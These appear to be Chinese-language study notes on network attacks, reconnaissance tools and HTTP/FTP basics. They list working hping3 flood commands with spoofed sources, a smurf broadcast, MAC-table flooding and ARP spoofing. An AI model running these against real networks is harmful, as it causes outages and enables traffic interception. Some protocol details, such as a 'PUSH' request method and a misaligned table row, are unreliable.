信息收集
- DOS攻击
hping3 -q -S -n --rand-source -p 80 --flood ip //TCP
hping3 -q -n -a 1.1.1.1 --udp -s 53 -p 80 --flood ip -d 1000 //udp
hping3 --icmp -c 1 --spoof 192.168.0.111 192.168.0.255 //smurf icmp
macchanger -e -a eth0 //交换机地址表攻击
- 欺骗
arpspoof -i eth0 -t ip ip //arp 欺骗
- 定义
网站指纹:网站系统名称和版本;广义上包括网站,中间件,操作系统的版本信息。
- 信息收集
1命令
whois url 收集域名信息
whatweb url 扫描网站指纹
wafw00f url
dirb url
theHarvester -d url -b 搜索引擎
fierce --domain url //通过dns注册信息获得子域名
2网址:
ping.chinaz.com //判断是否有cdn 获得ip
dnsdumpster.com //通过dns注册信息获得子域名
x.threatbook.cn //历史解析获得 ip
github.com //网站源码
search.censys.io //证书
shodan.io //
Web协议
- HTTP协议
http协议是web的主体,可以传输多种类型的文件。IP,TCP,DNS协议都在其中发挥重要作用。其中IP协议负责传输,TCP确保可靠,DNS负责解析域名。
http是无状态,它不对请求与响应间的通信状态进行保存,每有新的请求,就产生新的响应,不保存之前的一切信息。
- 什么是URL
URI =URL + URN
绝对URI的构成(格式和共享文件很像)
- HTTP请求方法
1.GET获取资源
2.PUSH传输实体主体
3.其他HEAD,CONNECT,PUT,DELETE,TRACE
- HTTP应用特点
1.管线化持久连接
2.使用Cookie进行状态管理,第一次连接时服务端会set-cookie通知客户端保存cookie,接下来客户端发送请求会添加cookie。
HTTP与FTP对比
相同点:
都是应用层协议,并且都是基于TCP协议的。
不同点:
HTTP/HTTPS | FTP/SFTP/TFTP | |
对象 | 网页 | 文件 |
端口号 | 80,443端口 | 20,21,22,69端口 |
控制信息 | 带内,用户标志,口令等都在报文中(状态行,首部字段)。 | 带外(out-of-band),FTP有两个并行的TCP,一个是控制连接,一个是数据连接 |
状态 | 无状态 | 整个会话期间保留用户状态 |
持久连接 | 控制连接是持久连接,数据连接是非持久连接 |
HTTP报文
